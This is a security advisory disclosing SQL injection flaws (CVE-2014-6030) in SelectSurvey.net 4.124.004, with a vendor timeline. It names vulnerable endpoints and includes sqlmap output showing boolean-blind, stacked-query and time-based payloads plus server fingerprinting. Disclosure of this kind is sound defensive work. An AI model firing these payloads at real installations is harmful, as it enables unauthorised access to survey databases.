Details ========== Software: ClassApps SelectSurvey.net Description: Multiple SQL Injection Vulnerabilities Version: 4.124.004 Homepage: https://www.classapps.com/SelectSurveyNETOverview.asp Vendor Fix: 4.125.002 CVE: 2014-6030 Timeline ========== Aug 28 2014 - Vendor Notified Aug 28 2014 - CVE Requested Aug 28 2014 - Vendor Response Sep 01 2014 - CVE Assigned Sep 01 2014 - Upgraded Version Released Sep 17 2014 - Disclosure Description ========== SelectSurvey.net is a web-based survey application written in ASP.net and C#. It is vulnerable to multiple SQL injection attacks, both authenticated and unauthenticated. The authenticated vulnerability resides within the file upload script, as the parameters are not sanitized prior to being placed into the SQL query. ClassApps had previously listed 'SQL injection protection' as a feature and did have several functions in place to attempt to prevent such attacks but due to using a "blacklisting" approach, it is possible to circumvent these functions. These functions are used elsewhere throughout the application to protect GET request variables but are not sufficient. Only this specific version of the application has been tested but it is highly likely these vulnerabilities exist within prior versions. It has not been confirmed that these vulnerabilities are fixed. The vendor stated that they would be fixed in this new release however, they do not allow download of the code unless you are a customer so fixes have not been verified. Examples ========== /survey/ReviewReadOnlySurvey.aspx?ResponseID=<num>&SurveyID=[SQLi] (unauthenticated) /survey/UploadImagePopupToDb.aspx?ResponseID=<num>&SurveyID=[SQLi] (authenticated) sqlmap identified the following injection points: --- Place: GET Parameter: SurveyID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ResponseID=1&SurveyID=1' AND 4002=4002 AND 'dLur'='dLur Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: ResponseID=1&SurveyID=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: ResponseID=1&SurveyID=1' WAITFOR DELAY '0:0:5'-- --- [14:01:39] [INFO] testing Microsoft SQL Server [14:01:39] [INFO] confirming Microsoft SQL Server [14:01:39] [INFO] the back-end DBMS is Microsoft SQL Server [14:01:39] [INFO] fetching banner web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5 back-end DBMS operating system: Windows 7 Service Pack 1 back-end DBMS: Microsoft SQL Server 2008 banner: --- Microsoft SQL Server 2008 R2 (SP2) - 10.50.4000.0 (X64) Jun 28 2012 08:36:30 Copyright (c) Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1) ---